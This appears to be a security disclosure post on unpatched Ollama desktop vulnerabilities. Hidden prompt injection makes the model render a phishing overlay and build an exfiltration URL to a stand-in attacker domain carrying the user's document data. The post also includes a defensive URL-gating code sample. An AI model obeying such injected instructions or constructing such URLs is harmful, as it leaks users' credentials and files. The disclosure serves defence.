# Unpatched Ollama Vulnerabilities: Phishing Overlays and Data Exfiltration

> Source: <https://www.promptarmor.com/resources/unpatched-ollama-vulnerabilities-phishing-overlays-and-data-exfiltration>
> Published: 2026-05-29 17:20:35+00:00


Ollama’s desktop app is vulnerable to phishing overlay and data exfiltration attacks via indirect prompt injection, overwriting the app with an attacker’s site.

## Context

Ollama is a leading tool for leveraging AI models, with over 170,000 stars on GitHub. Multiple vulnerabilities in the desktop app have been identified, enabling phishing and data exfiltration attacks.

The entire Ollama desktop interface can be overwritten by an attacker-controlled website via an indirect prompt-injection attack due to insecure rendering of model outputs.

**Three zero-click data exfiltration vectors exploitable via indirect prompt injection were also identified.**

*Note: No human-in-the-loop approval steps are required for any attacks in this article.*

These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.

## The Attack Chain

1. The user asks Ollama about an external website or externally-sourced file.

2. A prompt injection is hidden on the external site in 1 pt font white-on-white text.

3. The AI model is manipulated to output malicious HTML, overwriting the user interface with an attacker-controlled website.

   The AI model is manipulated to believe it must output an HTML element as part of its explanation to the user.

   *Note: Quitting and re-opening Ollama does not close the malicious overlay.*

4. The attacker logs the credentials entered into the malicious overlay.

## Data Exfiltration Attacks

In addition to the phishing risk noted above, three zero-click data exfiltration vectors that are exploitable via indirect prompt injection were identified.

- Data exfiltration via insecure web search tooling
- Data exfiltration via insecure rendering of Markdown image outputs
- Data exfiltration via insecure rendering of external HTML elements

Below is a data exfiltration attack chain that weaponizes insecure web search tooling:

*Note: This attack uses the same malicious website, but with a different prompt injection.*

1. A data source with a prompt injection is ingested (website, document, etc.).

2. AI is manipulated to access a malicious URL, exfiltrating data from documents the user has been working with.

   The model is manipulated to construct a URL using the attacker’s domain, with data from the victim’s previously uploaded documents stored in query parameters.

   *attacker.com/?data={AI puts the user’s data here}*

3. The attacker’s server logs the model’s request, including the victim’s data.
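One way a client could gate the zero-click requests described above, shown as an added example that is not code from Ollama or PromptArmor. It goes beyond the web search case to cover URLs in Markdown images and `src` attributes as well; all function names, the allowlist parameter and the `blog.example` domain are assumptions made for illustration.

```javascript
// Added example: not Ollama or PromptArmor code. Every name here is hypothetical.
// Policy: a URL is requested without a click only if the user typed that exact URL
// or its host is allowlisted; anything else needs explicit approval.

function parseHttpUrl(raw) {
  try {
    const url = new URL(raw);
    return url.protocol === "http:" || url.protocol === "https:" ? url : null;
  } catch {
    return null; // relative or malformed
  }
}

// Normalised URLs that appear in the user's own messages.
function userSuppliedUrls(userMessages) {
  const urls = new Set();
  for (const message of userMessages) {
    for (const match of message.matchAll(/https?:\/\/[^\s<>"')\]]+/g)) {
      const url = parseHttpUrl(match[0].replace(/[.,;:!?]+$/, "")); // drop sentence punctuation
      if (url) urls.add(url.href);
    }
  }
  return urls;
}

// URLs a renderer would load by itself: Markdown images and src attributes in raw HTML.
function autoLoadUrls(modelOutput) {
  const found = [];
  for (const m of modelOutput.matchAll(/!\[[^\]]*\]\(\s*<?([^\s)>]+)/g)) found.push(m[1]);
  for (const m of modelOutput.matchAll(/\bsrc\s*=\s*["']?([^\s"'>]+)/gi)) found.push(m[1]);
  return found;
}

// Verdict for one URL the model wants requested (tool call or rendered element).
function reviewModelUrl(raw, userMessages, allowedHosts = new Set()) {
  const url = parseHttpUrl(raw);
  if (!url) return { action: "block", reason: "not an absolute http(s) URL" };
  if (userSuppliedUrls(userMessages).has(url.href)) return { action: "allow", reason: "user supplied this URL" };
  if (allowedHosts.has(url.hostname)) return { action: "allow", reason: "allowlisted host" };
  // Same host as the page the user asked about is not enough: the injected page
  // and the collection endpoint can share a domain.
  const carriesData = url.search.length > 1 || url.hash.length > 1;
  return { action: "ask", reason: carriesData ? "model-built URL with parameters" : "URL the user never supplied" };
}

// Constructed sample; blog.example is a placeholder domain.
const userMessages = ["Please summarise https://blog.example/ai-post."];
console.log(reviewModelUrl("https://blog.example/?data=notes", userMessages));
```

An `ask` verdict is where a human approval prompt would sit; `autoLoadUrls` feeds the same check for rendered output before anything is fetched.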

## Responsible Disclosure

These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.

## Timeline

- Dec 18, 2025: PromptArmor discloses to Ollama
- Jan 20, 2026: PromptArmor follows up
- Jan 26, 2026: PromptArmor follows up
- Jan 29, 2026: PromptArmor follows up
- Feb 19, 2026: PromptArmor follows up
- May 28, 2026: Article published
